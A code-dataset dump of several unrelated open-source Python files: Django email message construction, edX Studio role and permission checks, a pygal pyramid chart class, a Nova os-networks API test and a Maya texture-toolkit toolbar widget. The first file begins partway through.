        msg = SafeMIMEText(smart_str(self.body, encoding),
                           self.content_subtype, encoding)
        # Wrap with alternatives/attachments as needed (see _create_message).
        msg = self._create_message(msg)
        msg['Subject'] = self.subject
        msg['From'] = self.extra_headers.get('From', self.from_email)
        msg['To'] = self.extra_headers.get('To', ', '.join(self.to))
        if self.cc:
            msg['Cc'] = ', '.join(self.cc)
        # Email header names are case-insensitive (RFC 2045), so we have to
        # accommodate that when doing comparisons.
        header_names = [key.lower() for key in self.extra_headers]
        if 'date' not in header_names:
            msg['Date'] = formatdate()
        if 'message-id' not in header_names:
            msg['Message-ID'] = make_msgid()
        for name, value in self.extra_headers.items():
            if name.lower() in ('from', 'to'): # From and To are already handled
                continue
            msg[name] = value
        return msg
    def recipients(self):
        """
        Returns a list of all recipients of the email (includes direct
        addressees as well as Cc and Bcc entries).
        """
        return self.to + self.cc + self.bcc
    def send(self, fail_silently=False):
        """Sends the email message."""
        if not self.recipients():
            # Don't bother creating the network connection if there's nobody to
            # send to.
            return 0
        return self.get_connection(fail_silently).send_messages([self])
    def attach(self, filename=None, content=None, mimetype=None):
        """
        Attaches a file with the given filename and content. The filename can
        be omitted and the mimetype is guessed, if not provided.
        If the first parameter is a MIMEBase subclass it is inserted directly
        into the resulting message attachments.
        """
        if isinstance(filename, MIMEBase):
            # NOTE(review): '==' comparison with None; 'is None' would be the
            # usual idiom -- behavior is the same for these types.
            assert content == mimetype == None
            self.attachments.append(filename)
        else:
            assert content is not None
            self.attachments.append((filename, content, mimetype))
    def attach_file(self, path, mimetype=None):
        """Attaches a file from the filesystem."""
        filename = os.path.basename(path)
        with open(path, 'rb') as f:
            content = f.read()
        self.attach(filename, content, mimetype)
    def _create_message(self, msg):
        # Hook point: subclasses (EmailMultiAlternatives) extend this.
        return self._create_attachments(msg)
    def _create_attachments(self, msg):
        # Wrap the body in a multipart/mixed container when attachments exist.
        if self.attachments:
            encoding = self.encoding or settings.DEFAULT_CHARSET
            body_msg = msg
            msg = SafeMIMEMultipart(_subtype=self.mixed_subtype, encoding=encoding)
            if self.body:
                msg.attach(body_msg)
            for attachment in self.attachments:
                if isinstance(attachment, MIMEBase):
                    msg.attach(attachment)
                else:
                    msg.attach(self._create_attachment(*attachment))
        return msg
    def _create_mime_attachment(self, content, mimetype):
        """
        Converts the content, mimetype pair into a MIME attachment object.
        """
        basetype, subtype = mimetype.split('/', 1)
        if basetype == 'text':
            encoding = self.encoding or settings.DEFAULT_CHARSET
            attachment = SafeMIMEText(smart_str(content, encoding), subtype, encoding)
        else:
            # Encode non-text attachments with base64.
            attachment = MIMEBase(basetype, subtype)
            attachment.set_payload(content)
            Encoders.encode_base64(attachment)
        return attachment
    def _create_attachment(self, filename, content, mimetype=None):
        """
        Converts the filename, content, mimetype triple into a MIME attachment
        object.
        """
        if mimetype is None:
            mimetype, _ = mimetypes.guess_type(filename)
            if mimetype is None:
                mimetype = DEFAULT_ATTACHMENT_MIME_TYPE
        attachment = self._create_mime_attachment(content, mimetype)
        if filename:
            try:
                filename = filename.encode('ascii')
            except UnicodeEncodeError:
                # Non-ASCII filenames use the RFC 2231 (charset, lang, value)
                # triple form.
                filename = ('utf-8', '', filename.encode('utf-8'))
            attachment.add_header('Content-Disposition', 'attachment',
                                  filename=filename)
        return attachment
class EmailMultiAlternatives(EmailMessage):
    """
    A version of EmailMessage that makes it easy to send multipart/alternative
    messages. For example, including text and HTML versions of the text is
    made easier.
    """
    alternative_subtype = 'alternative'
    def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
                 connection=None, attachments=None, headers=None, alternatives=None,
                 cc=None):
        """
        Initialize a single email message (which can be sent to multiple
        recipients).
        All strings used to create the message can be unicode strings (or UTF-8
        bytestrings). The SafeMIMEText class will handle any necessary encoding
        conversions.
        """
        super(EmailMultiAlternatives, self).__init__(subject, body, from_email, to, bcc, connection, attachments, headers, cc)
        # Each alternative is a (content, mimetype) pair.
        self.alternatives = alternatives or []
    def attach_alternative(self, content, mimetype):
        """Attach an alternative content representation."""
        assert content is not None
        assert mimetype is not None
        self.alternatives.append((content, mimetype))
    def _create_message(self, msg):
        # Alternatives are nested inside the attachments container.
        return self._create_attachments(self._create_alternatives(msg))
    def _create_alternatives(self, msg):
        # Wrap the body in multipart/alternative when alternatives exist.
        encoding = self.encoding or settings.DEFAULT_CHARSET
        if self.alternatives:
            body_msg = msg
            msg = SafeMIMEMultipart(_subtype=self.alternative_subtype, encoding=encoding)
            if self.body:
                msg.attach(body_msg)
            for alternative in self.alternatives:
                msg.attach(self._create_mime_attachment(*alternative))
        return msg
| bsd-3-clause |
utecuy/edx-platform | common/djangoapps/student/auth.py | 111 | 5910 | """
The application interface to roles which checks whether any user trying to change
authorization has authorization to do so, which infers authorization via role hierarchy
(GlobalStaff is superset of auths of course instructor, ...), which consults the config
to decide whether to check course creator role, and other such functions.
"""
from django.core.exceptions import PermissionDenied
from django.conf import settings
from opaque_keys.edx.locator import LibraryLocator
from student.roles import GlobalStaff, CourseCreatorRole, CourseStaffRole, CourseInstructorRole, CourseRole, \
CourseBetaTesterRole, OrgInstructorRole, OrgStaffRole, LibraryUserRole, OrgLibraryUserRole
# Studio permissions, expressed as a bitmask (combine with bitwise OR; see
# get_user_permissions below):
STUDIO_EDIT_ROLES = 8
STUDIO_VIEW_USERS = 4
STUDIO_EDIT_CONTENT = 2
STUDIO_VIEW_CONTENT = 1
# In addition to the above, one is always allowed to "demote" oneself to a
# lower role within a course, or to remove oneself.
def user_has_role(user, role):
    """
    Check whether this user has access to this role (either direct or implied)
    :param user:
    :param role: an AccessRole
    """
    if not user.is_active:
        return False
    # Global staff implies every other role; test it first because it is
    # the cheapest check even though it is not the direct one.
    if GlobalStaff().has_user(user):
        return True
    # CourseCreator is special: its meaning depends on feature flags.
    if isinstance(role, CourseCreatorRole):
        features = settings.FEATURES
        # Course creation completely shut down by config.
        if features.get('DISABLE_COURSE_CREATION', False):
            return False
        # Course creation wide open: everyone qualifies.
        if not features.get('ENABLE_CREATOR_GROUP', False):
            return True
    if role.has_user(user):
        return True
    # Inferred permissions: a course instructor implicitly holds that
    # course's staff and beta-tester roles.
    return bool(
        isinstance(role, (CourseStaffRole, CourseBetaTesterRole))
        and CourseInstructorRole(role.course_key).has_user(user)
    )
def get_user_permissions(user, course_key, org=None):
    """
    Get the bitmask of permissions that this user has in the given course context.
    Can also set course_key=None and pass in an org to get the user's
    permissions for that organization as a whole.

    Returns a combination of the STUDIO_* flags (or 0 for no access).
    """
    if org is None:
        org = course_key.org
        # Permissions are branch-agnostic: normalize the key.
        course_key = course_key.for_branch(None)
    else:
        assert course_key is None
    all_perms = STUDIO_EDIT_ROLES | STUDIO_VIEW_USERS | STUDIO_EDIT_CONTENT | STUDIO_VIEW_CONTENT
    # global staff, org instructors, and course instructors have all permissions:
    if GlobalStaff().has_user(user) or OrgInstructorRole(org=org).has_user(user):
        return all_perms
    if course_key and user_has_role(user, CourseInstructorRole(course_key)):
        return all_perms
    # Staff have all permissions except EDIT_ROLES:
    if OrgStaffRole(org=org).has_user(user) or (course_key and user_has_role(user, CourseStaffRole(course_key))):
        return STUDIO_VIEW_USERS | STUDIO_EDIT_CONTENT | STUDIO_VIEW_CONTENT
    # Otherwise, for libraries, users can view only:
    if course_key and isinstance(course_key, LibraryLocator):
        if OrgLibraryUserRole(org=org).has_user(user) or user_has_role(user, LibraryUserRole(course_key)):
            return STUDIO_VIEW_USERS | STUDIO_VIEW_CONTENT
    # No role matched: no Studio access at all.
    return 0
def has_studio_write_access(user, course_key):
    """
    Return True when *user* may modify the given course in Studio.

    Note that the CMS permissions model is with respect to courses; a
    superuser (user.is_staff) always qualifies, and course instructors
    inherit every right that course staff have, so the underlying
    permission lookup cascades accordingly.

    :param user:
    :param course_key: a CourseKey
    """
    granted = get_user_permissions(user, course_key)
    return (granted & STUDIO_EDIT_CONTENT) != 0
def has_course_author_access(user, course_key):
    """
    Old name for has_studio_write_access
    Kept as a thin alias for backward compatibility with existing callers.
    """
    return has_studio_write_access(user, course_key)
def has_studio_read_access(user, course_key):
    """
    Return True iff *user* is allowed to view this course/library in Studio.

    Anyone with write access (see has_course_author_access) passes as well.
    There is currently no read-only access to courses in Studio — only
    content libraries support view-only users.
    """
    granted = get_user_permissions(user, course_key)
    return (granted & STUDIO_VIEW_CONTENT) != 0
def add_users(caller, role, *users):
    """
    The caller requests adding the given users to the role. Checks that the caller
    has sufficient authority.
    Raises PermissionDenied (via _check_caller_authority) otherwise.
    :param caller: a user
    :param role: an AccessRole
    """
    _check_caller_authority(caller, role)
    role.add_users(*users)
def remove_users(caller, role, *users):
    """
    The caller requests removing the given users from the role. Checks that
    the caller has sufficient authority, except that anyone may remove
    themselves (at this layer).
    :param caller: a user
    :param role: an AccessRole
    """
    removing_only_self = len(users) == 1 and caller == users[0]
    if not removing_only_self:
        _check_caller_authority(caller, role)
    role.remove_users(*users)
def _check_caller_authority(caller, role):
    """
    Internal function to check whether the caller has authority to manipulate this role
    Raises PermissionDenied when not authorized; returns None when allowed.
    :param caller: a user
    :param role: an AccessRole
    """
    if not (caller.is_authenticated() and caller.is_active):
        raise PermissionDenied
    # superuser
    if GlobalStaff().has_user(caller):
        return
    # Only global staff (handled above) may grant global or course-creator roles.
    if isinstance(role, (GlobalStaff, CourseCreatorRole)):
        raise PermissionDenied
    elif isinstance(role, CourseRole):  # instructors can change the roles w/in their course
        if not user_has_role(caller, CourseInstructorRole(role.course_key)):
            raise PermissionDenied
| agpl-3.0 |
colevscode/pygal | pygal/graph/verticalpyramid.py | 2 | 3418 | # -*- coding: utf-8 -*-
# This file is part of pygal
#
# A python svg graph plotting library
# Copyright © 2012-2014 Kozea
#
# This library is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pygal. If not, see <http://www.gnu.org/licenses/>.
"""
Pyramid chart
"""
from __future__ import division
from pygal.adapters import positive
from pygal.graph.stackedbar import StackedBar
class VerticalPyramid(StackedBar):
    """Pyramid graph: a stacked bar chart where even-indexed series are
    drawn downward and odd-indexed series upward, mirrored around zero."""

    # All values are forced positive; sign is reintroduced by series parity.
    _adapters = [positive]

    def _format(self, value):
        """Format a value for display, always as its absolute magnitude."""
        # `value and abs(value)` keeps None/0 untouched.
        value = value and abs(value)
        return super(VerticalPyramid, self)._format(value)

    def _get_separated_values(self, secondary=False):
        """Split series values by parity: odd indexes are the "positive"
        side, even indexes the "negative" side. Returns two lists of
        per-position value tuples."""
        series = self.secondary_series if secondary else self.series
        positive_vals = zip(*[serie.safe_values
                              for index, serie in enumerate(series)
                              if index % 2])
        negative_vals = zip(*[serie.safe_values
                              for index, serie in enumerate(series)
                              if not index % 2])
        return list(positive_vals), list(negative_vals)

    def _compute_box(self, positive_vals, negative_vals):
        """Set the y range symmetrically around zero from the larger of the
        two stacked sums."""
        positive_sum = list(map(sum, positive_vals)) or [self.zero]
        negative_sum = list(map(sum, negative_vals)) or [self.zero]
        self._box.ymax = max(max(positive_sum), max(negative_sum))
        self._box.ymin = - self._box.ymax

    def _compute_secondary(self):
        """Compute scale and labels for the secondary (right) axis."""
        # Need refactoring
        if self.secondary_series:
            y_pos = list(zip(*self._y_labels))[1]
            positive_vals, negative_vals = self._get_separated_values(True)
            # Bug fix: wrap map() in list() as _compute_box does. On
            # Python 3, map() returns an always-truthy iterator, so the
            # `or [self.zero]` fallback never fired and max() could raise
            # ValueError on an empty side.
            positive_sum = list(map(sum, positive_vals)) or [self.zero]
            negative_sum = list(map(sum, negative_vals)) or [self.zero]
            ymax = max(max(positive_sum), max(negative_sum))
            ymin = -ymax
            min_0_ratio = (self.zero - self._box.ymin) / self._box.height
            max_0_ratio = (self._box.ymax - self.zero) / self._box.height
            new_ymax = (self.zero - ymin) * (1 / min_0_ratio - 1)
            new_ymin = -(ymax - self.zero) * (1 / max_0_ratio - 1)
            if ymax > self._box.ymax:
                ymin = new_ymin
            else:
                ymax = new_ymax
            left_range = abs(self._box.ymax - self._box.ymin)
            right_range = abs(ymax - ymin)
            self._scale = left_range / right_range
            self._scale_diff = self._box.ymin
            self._scale_min_2nd = ymin
            self._y_2nd_labels = [
                (self._format(self._box.xmin + y * right_range / left_range),
                 y)
                for y in y_pos]

    def _bar(self, parent, x, y, index, i, zero, shift=True, secondary=False):
        """Draw one bar, mirroring odd-indexed series below the axis.
        `shift` is always forced to False for pyramid stacking."""
        if index % 2:
            y = -y
        return super(VerticalPyramid, self)._bar(
            parent, x, y, index, i, zero, False, secondary)
| lgpl-3.0 |
zzicewind/nova | nova/tests/functional/v3/test_networks.py | 3 | 3929 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.network import api as network_api
from nova.tests.functional.v3 import api_sample_base
from nova.tests.unit.api.openstack.compute.contrib import test_networks
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class NetworksJsonTests(api_sample_base.ApiSampleTestBaseV3):
    """API sample tests for the os-networks extension, run against a fake
    network API so no real networking backend is required."""
    ADMIN_API = True
    extension_name = "os-networks"
    # TODO(gmann): Overriding '_api_version' till all functional tests
    # are merged between v2 and v2.1. After that base class variable
    # itself can be changed to 'v2'
    _api_version = 'v2'

    def _get_flags(self):
        # Enable the os-networks and extended_networks extensions on top
        # of whatever the base class configures.
        f = super(NetworksJsonTests, self)._get_flags()
        f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
        f['osapi_compute_extension'].append('nova.api.openstack.compute.'
                      'contrib.os_networks.Os_networks')
        f['osapi_compute_extension'].append('nova.api.openstack.compute.'
                      'contrib.extended_networks.Extended_networks')
        return f

    def setUp(self):
        # Replace every network API entry point used by the extension with
        # the in-memory fake so responses are deterministic.
        super(NetworksJsonTests, self).setUp()
        fake_network_api = test_networks.FakeNetworkAPI()
        self.stubs.Set(network_api.API, "get_all",
                       fake_network_api.get_all)
        self.stubs.Set(network_api.API, "get",
                       fake_network_api.get)
        self.stubs.Set(network_api.API, "associate",
                       fake_network_api.associate)
        self.stubs.Set(network_api.API, "delete",
                       fake_network_api.delete)
        self.stubs.Set(network_api.API, "create",
                       fake_network_api.create)
        self.stubs.Set(network_api.API, "add_network_to_project",
                       fake_network_api.add_network_to_project)

    def test_network_list(self):
        # GET /os-networks returns the full network list.
        response = self._do_get('os-networks')
        subs = self._get_regexes()
        self._verify_response('networks-list-resp', subs, response, 200)

    def test_network_disassociate(self):
        # POST .../action disassociate returns 202 with an empty body.
        uuid = test_networks.FAKE_NETWORKS[0]['uuid']
        response = self._do_post('os-networks/%s/action' % uuid,
                                 'networks-disassociate-req', {})
        self.assertEqual(response.status_code, 202)
        self.assertEqual(response.content, "")

    def test_network_show(self):
        # GET /os-networks/<uuid> returns a single network.
        uuid = test_networks.FAKE_NETWORKS[0]['uuid']
        response = self._do_get('os-networks/%s' % uuid)
        subs = self._get_regexes()
        self._verify_response('network-show-resp', subs, response, 200)

    def test_network_create(self):
        # POST /os-networks creates a network and echoes it back.
        response = self._do_post("os-networks",
                                 'network-create-req', {})
        subs = self._get_regexes()
        self._verify_response('network-create-resp', subs, response, 200)

    def test_network_add(self):
        # POST /os-networks/add attaches a network to the project (202, empty).
        response = self._do_post("os-networks/add",
                                 'network-add-req', {})
        self.assertEqual(response.status_code, 202)
        self.assertEqual(response.content, "")

    def test_network_delete(self):
        # DELETE /os-networks/<id> returns 202 with an empty body.
        response = self._do_delete('os-networks/always_delete')
        self.assertEqual(response.status_code, 202)
        self.assertEqual(response.content, "")
Bioeden/dbMayaTextureToolkit | mttViewStatusLine.py | 1 | 16620 | # Python import
import os
# PySide import
from PySide.QtCore import Qt, Signal
from PySide.QtGui import (QHBoxLayout, QLabel)
# Maya import
from maya import cmds
# Custom import
from mttConfig import MTTSettings
from mttCustomWidget import StatusCollapsibleLayout, StatusScrollArea
import mttFilterFileDialog
import mttCmd
import mttCmdUi
class MTTStatusLine(QHBoxLayout):
    """ Create custom toolbar with collapse Maya Status Line behavior """

    # Signals relayed to the owning view so it can react to toolbar toggles.
    viewerToggled = Signal()
    filterSelectionToggled = Signal(bool)
    pinModeToggled = Signal(bool)
    externalVizToggled = Signal()

    def __init__(self, settings_menu, model, proxy):
        """Build the status line.

        :param settings_menu: menu attached to the settings button
        :param model: texture table model (queried for file/node counts)
        :param proxy: proxy model used to count currently visible rows
        """
        super(MTTStatusLine, self).__init__()

        self.settings_menu = settings_menu
        self.model = model
        self.proxy = proxy

        self.__create_ui()
        self.__init_ui()

    def __create_ui(self):
        """Create all widgets: button groups, counter label, settings menu."""
        # FILTERS
        scroll_area = StatusScrollArea()
        scroll_area.add_widget(self._create_filter_group())
        scroll_area.add_widget(self._create_visibility_group())
        scroll_area.add_widget(self._create_folder_group())
        scroll_area.add_widget(self._create_auto_group())
        scroll_area.add_widget(self._create_mtt_tools_group())
        scroll_area.add_widget(self._create_maya_tools_group())
        user_grp = self._create_user_group()
        # _create_user_group returns None when no custom buttons are defined.
        if user_grp:
            scroll_area.add_widget(user_grp)
        self.addWidget(scroll_area)

        # STATS information
        self.stat_info = QLabel()
        self.stat_info.setAlignment(Qt.AlignCenter | Qt.AlignRight)
        self.stat_info.setText('0 File | 0/0 Node')
        self.stat_info.setToolTip(
            'number of files | number of nodes shown / total number of nodes')
        self.addWidget(self.stat_info)

        # SETTINGS button
        self.info_btn = mttCmdUi.create_status_button(
            ':/tb_config', 'Settings', None, False)
        self.info_btn.setMenu(self.settings_menu)
        self.addWidget(self.info_btn)

    def __init_ui(self):
        """Restore every toggle/group state from the saved MTT settings."""
        self.setContentsMargins(0, 0, 0, 0)
        self.setAlignment(Qt.AlignLeft)

        # FILTER GROUP
        self.selection_btn.setChecked(MTTSettings.value('onlySelectionState'))
        self.writable_btn.setChecked(MTTSettings.value('onlyWritableState'))
        self.reference_btn.setChecked(MTTSettings.value('showReferenceState'))
        self.wrong_name_btn.setChecked(MTTSettings.value('showWrongNameState'))
        self.filter_instances_btn.setChecked(
            MTTSettings.value('filterInstances'))
        self.filter_grp.set_current_state(MTTSettings.value('filterGroup'))

        # VISIBILITY GROUP
        self.wrong_name_visibility_btn.setChecked(
            MTTSettings.value('vizWrongNameState'))
        self.wrong_path_visibility_btn.setChecked(
            MTTSettings.value('vizWrongPathState'))
        self.external_visibility_btn.setChecked(
            MTTSettings.value('vizExternalState'))
        self.basename_visibility_btn.setChecked(
            MTTSettings.value('showBasenameState'))
        # Namespace button semantics are inverted relative to the setting.
        self.namespace_visibility_btn.setChecked(
            not MTTSettings.value('showNamespaceState'))
        self.visibility_grp.set_current_state(MTTSettings.value('visibilityGroup'))

        # FOLDER GROUP
        self.folder_grp.set_current_state(MTTSettings.value('folderGroup'))

        # AUTO GROUP
        self.auto_reload_btn.setChecked(MTTSettings.value('autoReload'))
        self.auto_select_btn.setChecked(MTTSettings.value('autoSelect'))
        self.auto_rename_btn.setChecked(MTTSettings.value('autoRename'))
        self.auto_grp.set_current_state(MTTSettings.value('autoGroup'))

        # MTT TOOLS
        self.viewer_btn.setChecked(MTTSettings.value('viewerState'))
        self.tool_grp.set_current_state(MTTSettings.value('toolGroup', 1))

        # MAYA TOOLS SHORTCUT
        self.maya_grp.set_current_state(MTTSettings.value('mayaGroup', 1))

    def _create_filter_group(self):
        """Create the collapsible group of node-filtering toggle buttons."""
        # create toolbar buttons
        self.selection_btn = mttCmdUi.create_status_button(
            ':/tb_onlySelection',
            'Show textures applied to current selection',
            self.on_show_only_selection,
            True)
        self.writable_btn = mttCmdUi.create_status_button(
            ':/tb_onlyWritable',
            'Hide read-only textures',
            self.on_show_only_writable,
            True)
        self.reference_btn = mttCmdUi.create_status_button(
            ':/tb_onlyReference',
            'Hide references',
            self.on_show_reference,
            True)
        self.pin_btn = mttCmdUi.create_status_button(
            ':/tb_onlyPinned',
            'Pin textures',
            self.on_pin_nodes,
            True)
        self.wrong_name_btn = mttCmdUi.create_status_button(
            ':/tb_onlyWrongName',
            'Show Node name clashing with Texture name',
            self.on_show_wrong_name,
            True)
        self.filter_instances_btn = mttCmdUi.create_status_button(
            ':/tb_hideInstances',
            'Show only one instance per file',
            self.on_filter_instances,
            True)

        # sort toolbar buttons
        self.filter_grp = StatusCollapsibleLayout(
            section_name='Show/Hide the filter icons')
        self.filter_grp.add_button(self.pin_btn)
        self.filter_grp.add_button(self.selection_btn)
        self.filter_grp.add_button(self.reference_btn)
        self.filter_grp.add_button(self.writable_btn)
        self.filter_grp.add_button(self.wrong_name_btn)
        self.filter_grp.add_button(self.filter_instances_btn)
        return self.filter_grp

    def _create_visibility_group(self):
        """Create the collapsible group of display/highlight toggle buttons."""
        # create toolbar buttons
        self.wrong_name_visibility_btn = mttCmdUi.create_status_button(
            ':/tb_vizWrongName',
            'Highlight Node name clashing with Texture name',
            self.on_wrong_name_visibility,
            True)
        self.external_visibility_btn = mttCmdUi.create_status_button(
            ':/tb_vizExternal',
            'Highlight Texture path that comes from outside current workspace',
            self.on_external_visibility,
            True)
        self.wrong_path_visibility_btn = mttCmdUi.create_status_button(
            ':/tb_vizWrongPath',
            'Highlight Texture path clashing with user defined path pattern',
            self.on_wrong_path_visibility,
            True)
        self.basename_visibility_btn = mttCmdUi.create_status_button(
            ':/tb_vizBasename',
            'Show files texture name only',
            self.on_basename_visibility,
            True)
        self.namespace_visibility_btn = mttCmdUi.create_status_button(
            ':/tb_vizNamespace',
            'Toggle namespace visibility',
            self.on_namespace_visibility,
            True)

        # sort toolbar buttons
        self.visibility_grp = StatusCollapsibleLayout(
            section_name='Show/Hide the visibility icons')
        self.visibility_grp.add_button(self.namespace_visibility_btn)
        self.visibility_grp.add_button(self.wrong_name_visibility_btn)
        self.visibility_grp.add_button(self.external_visibility_btn)
        self.visibility_grp.add_button(self.wrong_path_visibility_btn)
        self.visibility_grp.add_button(self.basename_visibility_btn)
        return self.visibility_grp

    def _create_folder_group(self):
        """Create the collapsible group of folder-opening shortcut buttons."""
        self.folder_grp = StatusCollapsibleLayout(
            section_name='Show/Hide the folder icons')
        # create toolbar buttons
        self.folder_grp.add_button(mttCmdUi.create_status_button(
            ':/tb_folderMap',
            'Open sourceimages folder',
            self.on_open_sourceimages_folder,
            False)
        )
        self.folder_grp.add_button(mttCmdUi.create_status_button(
            ':/tb_folderSrc',
            'Open source folder',
            self.on_open_source_folder,
            False)
        )
        return self.folder_grp

    def _create_auto_group(self):
        """Create the collapsible group of auto-action toggle buttons."""
        # create toolbar buttons
        self.auto_reload_btn = mttCmdUi.create_status_button(
            ':/tb_toolbar_autoReload',
            'Auto Reload Textures',
            self.on_auto_reload,
            True)
        self.auto_select_btn = mttCmdUi.create_status_button(
            ':/tb_toolbar_autoSelect',
            'Auto Select Textures Node',
            self.on_auto_select,
            True)
        self.auto_rename_btn = mttCmdUi.create_status_button(
            ':/tb_toolbar_autoRename',
            'Auto Rename Textures Node',
            self.on_auto_rename,
            True)

        # sort toolbar buttons
        self.auto_grp = StatusCollapsibleLayout(
            section_name='Show/Hide the auto actions icons')
        self.auto_grp.add_button(self.auto_reload_btn)
        self.auto_grp.add_button(self.auto_select_btn)
        self.auto_grp.add_button(self.auto_rename_btn)
        return self.auto_grp

    def _create_mtt_tools_group(self):
        """Create the collapsible group of MTT tool launcher buttons."""
        # create toolbar buttons
        self.viewer_btn = mttCmdUi.create_status_button(
            ':/tb_Viewer',
            'Show/Hide Viewer',
            self.on_toggle_viewer,
            False)
        create_node_btn = mttCmdUi.create_status_button(
            ':/tb_toolCreateNode',
            'Create Node',
            self.on_create_node,
            False)

        # sort toolbar buttons
        self.tool_grp = StatusCollapsibleLayout(
            section_name='Show/Hide the tools icons')
        self.tool_grp.add_button(self.viewer_btn)
        self.tool_grp.add_button(create_node_btn)
        return self.tool_grp

    def _create_maya_tools_group(self):
        """Create the collapsible group of Maya editor shortcut buttons."""
        # sort toolbar buttons
        self.maya_grp = StatusCollapsibleLayout(
            section_name='Show/Hide the Maya tools icons')
        # create toolbar buttons
        self.maya_grp.add_button(mttCmdUi.create_status_button(
            ':/tb_Hypershade',
            'Hypershade',
            self.on_open_hypershade,
            False)
        )
        self.maya_grp.add_button(mttCmdUi.create_status_button(
            ':/tb_NodeEditor',
            'Node Editor',
            self.on_open_node_editor,
            False)
        )
        self.maya_grp.add_button(mttCmdUi.create_status_button(
            ':/tb_UVEditor',
            'UV Texture Editor',
            self.on_open_uv_editor,
            False)
        )
        return self.maya_grp

    def _create_user_group(self):
        """Create the optional group of user-defined buttons.

        Returns None when MTTSettings.CUSTOM_BUTTONS is empty.
        """
        if MTTSettings.CUSTOM_BUTTONS:
            self.custom_grp = StatusCollapsibleLayout(
                section_name='Show/Hide custom tools')
            for btnData in MTTSettings.CUSTOM_BUTTONS:
                # NOTE(review): eval() of a settings-provided command string
                # executes arbitrary code; the settings file must be trusted.
                self.custom_grp.add_button(mttCmdUi.create_status_button(
                    btnData[0],
                    btnData[1],
                    eval(btnData[2]),
                    False)
                )
            return self.custom_grp

    def _set_filter_value(self, key, value):
        """Store a filter setting and force the model/proxy to re-filter."""
        self.model.layoutAboutToBeChanged.emit()
        MTTSettings.set_value(key, value)
        # Invalidate the cached instance filtering result.
        cmds.optionVar(stringValue=('filtered_instances', ''))
        self.model.layoutChanged.emit()
        self.update_node_file_count()

    def on_show_only_selection(self):
        """ Filter nodes from current selection """
        state = self.selection_btn.isChecked()
        MTTSettings.set_value('onlySelectionState', state)
        self.filterSelectionToggled.emit(state)

    def on_show_only_writable(self):
        """ Filter nodes with their file state """
        self._set_filter_value(
            'onlyWritableState', self.writable_btn.isChecked())

    def on_show_reference(self):
        """ Filter referenced nodes """
        self._set_filter_value(
            'showReferenceState', self.reference_btn.isChecked())

    def on_pin_nodes(self):
        """ Filter pinned nodes """
        self.pinModeToggled.emit(self.pin_btn.isChecked())

    def on_show_wrong_name(self):
        """ Filter node with the same name as texture """
        self._set_filter_value(
            'showWrongNameState', self.wrong_name_btn.isChecked())

    def on_wrong_name_visibility(self):
        """ Highlight node with the same name as texture """
        self._set_filter_value(
            'vizWrongNameState', self.wrong_name_visibility_btn.isChecked())

    def on_wrong_path_visibility(self):
        """ Highlight Texture path clashing with user defined path pattern """
        self._set_filter_value(
            'vizWrongPathState', self.wrong_path_visibility_btn.isChecked())

    def on_external_visibility(self):
        """ Highlight Texture path that comes from outside current workspace """
        state = self.external_visibility_btn.isChecked()
        self._set_filter_value('vizExternalState', state)
        if state:
            self.externalVizToggled.emit()

    def on_basename_visibility(self):
        """ Filter file path """
        self._set_filter_value(
            'showBasenameState', self.basename_visibility_btn.isChecked())

    def on_namespace_visibility(self):
        """ Filter namespace name """
        self._set_filter_value(
            'showNamespaceState', not self.namespace_visibility_btn.isChecked())

    def on_filter_instances(self):
        """ Show only one instance per file """
        self._set_filter_value(
            'filterInstances', self.filter_instances_btn.isChecked())

    def on_open_sourceimages_folder(self):
        """ Open sourceimages folder """
        folder_path = self.model.get_sourceimages_path()
        if os.path.isdir(folder_path):
            # os.startfile is Windows-only; matches original behavior.
            os.startfile(folder_path)
            # launchImageEditor can be an alternative
            # cmds.launchImageEditor(viewImageFile=directory)

    @staticmethod
    def on_open_source_folder():
        """ Open source folder """
        folder_path = mttCmd.get_texture_source_folder()
        if os.path.isdir(folder_path):
            os.startfile(folder_path)

    @staticmethod
    def on_auto_reload():
        """Toggle the persisted auto-reload setting."""
        state = MTTSettings.value('autoReload')
        MTTSettings.set_value('autoReload', not state)

    @staticmethod
    def on_auto_select():
        """Toggle the persisted auto-select setting."""
        state = MTTSettings.value('autoSelect')
        MTTSettings.set_value('autoSelect', not state)

    @staticmethod
    def on_auto_rename():
        """Toggle the persisted auto-rename setting."""
        state = MTTSettings.value('autoRename')
        MTTSettings.set_value('autoRename', not state)

    def on_toggle_viewer(self):
        """Notify the owner that the viewer button was pressed."""
        self.viewerToggled.emit()

    @staticmethod
    def on_create_node():
        """Open the create-node dialog."""
        mttFilterFileDialog.create_nodes()

    @staticmethod
    def on_open_hypershade():
        """ Open Maya Hypershade """
        cmds.HypershadeWindow()

    @staticmethod
    def on_open_node_editor():
        """ Open Maya Node Editor """
        cmds.NodeEditorWindow()

    @staticmethod
    def on_open_uv_editor():
        """ Open Maya UV Texture Editor """
        cmds.TextureViewWindow()

    def update_node_file_count(self):
        """Refresh the "files | shown/total nodes" counter label."""
        file_count = self.model.get_file_count()
        file_str = 'file{}'.format(['', 's'][file_count > 1])
        node_shown_count = self.proxy.rowCount()
        node_count = self.model.get_node_count()
        # Bug fix: use the singular for exactly one node ("1 node", not
        # "1 nodes"), consistent with the file pluralization above.
        node_str = 'node' if node_count <= 1 else 'nodes'
        self.stat_info.setText('%d %s | %d/%d %s' % (
            file_count, file_str, node_shown_count, node_count, node_str))

    def save_states(self):
        """Persist button and group states to the MTT settings."""
        # buttons states
        MTTSettings.set_value('onlySelectionState', self.selection_btn.isChecked())
        MTTSettings.set_value('onlyWritableState', self.writable_btn.isChecked())
        MTTSettings.set_value('showReferenceState', self.reference_btn.isChecked())
